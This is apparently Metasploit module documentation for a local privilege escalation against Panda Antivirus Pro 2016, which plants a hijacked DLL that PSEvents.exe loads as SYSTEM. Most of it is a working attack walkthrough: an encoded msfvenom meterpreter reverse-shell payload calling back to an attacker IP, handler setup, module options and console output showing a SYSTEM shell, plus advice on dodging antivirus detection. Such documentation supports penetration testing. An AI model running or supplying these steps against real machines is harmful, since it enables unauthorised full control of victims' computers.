6.8 KiB
Vulnerable Application
Panda Antivirus Pro 2016 16.1.2 is available from filehippo or from an unofficial git.
The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
- Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
- Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
Verification Steps
Example steps in this format:
- Install the application
- Wait for
C:\ProgramData\Panda Security\Panda Devices Agent\Downloadsfolder to appear - Start msfconsole
- Get a shell
- Do:
use exploit/windows/local/panda_psevents - Do:
set session [ID] - Do:
exploit - Go do something else while you wait
- Enjoy being system with your shell
Options
DLL
Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details.
| WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll | |
|---|---|---|---|---|---|---|
| 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no |
| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no |
| 32bit target (0), win7sp1 x86 | valid | valid (caught by av) |
In this chart, CRASH means PSEvents.exe crashed on the system. NO means PSEvents didn't crash, but no session was obtained. valid means we got a shell.
ListenerTimeout
How long to wait for a shell. PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)
Scenarios
Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2
Step 1, get a local shell. I used msfvenom to drop an exe for easy user level meterpreter.
msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 4449
lport => 4449
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4449
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.2.117:4449 -> 192.168.2.91:63617) at 2016-09-25 20:32:15 -0400
meterpreter > getuid
Server username: IE11Win8_1\IEUser
meterpreter > background
[*] Backgrounding session 1...
Step 2, drop our panda exploit
use exploit/windows/local/panda_psevents
msf exploit(panda_psevents) > set session 1
session => 1
msf exploit(panda_psevents) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(panda_psevents) > set exitfunc seh
exitfunc => seh
msf exploit(panda_psevents) > set DLL CRYPTBASE.dll
DLL => CRYPTBASE.dll
msf exploit(panda_psevents) > show options
Module options (exploit/windows/local/panda_psevents):
Name Current Setting Required Description
---- --------------- -------- -----------
DLL CRYPTBASE.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
ListenerTimeout 3610 yes Number of seconds to wait for the exploit
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.2.117 yes The listen address
LPORT 4450 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(panda_psevents) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4450
[*] Uploading the Payload DLL to the filesystem...
[*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
[*] Start Time: 2016-09-27 18:10:21 -0400
[*] Sending stage (957999 bytes) to 192.168.2.91
[*] Meterpreter session 2 opened (192.168.2.117:4450 -> 192.168.2.91:50022) at 2016-09-27 18:46:15 -0400
[+] Deleted C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : IE11WIN8_1
OS : Windows 8.1 (Build 9600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > background
Failed Exploitation Attempts
If the dll doesn't work, PSEvents.exe will fail to run. While silent to the user, an error will occur in the Application Windows Logs.
- Event ID: 1000
- Task Category (100)
- Log Name: Application
- Source: Application Error
- Details:
Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
Exception code: 0xc0000374
Fault offset: 0x000d0cf2
Faulting process id: 0xdd0
Faulting application start time: 0x01d218a30fbf1ac5
Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
Faulting package full name:
Faulting package-relative application ID: